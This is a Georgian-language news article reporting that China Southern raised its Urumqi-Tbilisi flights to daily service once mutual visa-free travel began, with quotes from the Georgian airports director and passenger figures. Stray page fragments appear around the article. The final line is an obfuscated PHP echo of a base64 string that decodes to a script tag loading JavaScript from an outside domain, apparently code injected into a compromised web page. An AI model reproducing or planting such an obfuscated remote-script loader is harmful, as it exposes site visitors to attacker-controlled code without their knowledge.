celsiusi
ავერსი შნაიდერი

საქართველოსა და ჩინეთის სახალხო რესპუბლიკას შორის უვიზო რეჟიმის ორმხრივად ამოქმედების შემდეგ, ჩინეთის ერთ-ერთმა უმსხვილესმა ავიაკომპანია China Southern-მა ურუმჩი-თბილისი-ურუმჩის მიმართულებით პირდაპირი ფრენები კვირაში 4-დან 7-მდე გაზარდა. საქართველოს აეროპორტების გაერთიანების გენერალური დირექტორის შეფასებით, საქართველოსა და ჩინეთს შორის უვიზო რეჟიმის ამოქმედება და ყოველდღიური პირდაპირი ფრენები ხელს შეუწყობს ახალი ტურისტული ნაკადების გენერირებას და საქართველოს ავიაბაზარზე აზიური ავიაკომპანიების წილის ზრდას.

,,მოხარულები ვართ, რომ ავიაკომპანიასთან ჩვენი შეხვედრიდან ზუსტად 1 თვის შემდეგ China Southern-ი თბილისიდან ფრენის სიხშირეებს ზრდის და ამას რა თქმა უნდა ხელი, ჩვენს ქვეყნებს შორის უვიზო რეჟიმის ამოქმედებამ შეუწყო. ყოველდღიური ფრენები და უვიზო მიმოსვლა მნიშვნელოვანი ფაქტორია ახალი ტურისტული ნაკადების მოზიდვასა და ჩვენს ბაზარზე აზიური ავიაკომპანიების წილის ზრდაში. ჩვენი შემდეგი ამოცანაა, რომ ეტაპობრივად გავზარდოთ ფრენების არეალი ჩინეთის სხვა ქალაქებიდან და პირველ რიგში, ერთმანეთთან დედაქალაქები დავაკავშიროთ,-‘’განაცხადა ირაკლი ქარქაშაძემ.

China southern airlines-მა იანვარ-აპრილის პერიოდში ურუმჩი-თბილისი-ურუმჩის მიმართულებით 45 რეისი შეასრულა და 10,087  მგზავრს მოემსახურა. 2023 წლის 11 სექტემბრიდან საქართველოს მთავრობამ ჩინეთის მოქალაქეებისთვის სავიზო რეჟიმი გააუქმა. 2024 წლის 28 მაისიდან კი ჩინეთში საქართველოს მოქალაქეებს უვიზოდ შესვლა შეუძლიათ. უვიზო მიმოსვლის ორმხრივად ამოქმედების შემდეგ, ღამით თბილისიდან ურუმჩიში ავიაკომპანია China Southern-მა პირველი პირდაპირი რეისი შეასრულა.

mini

211
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");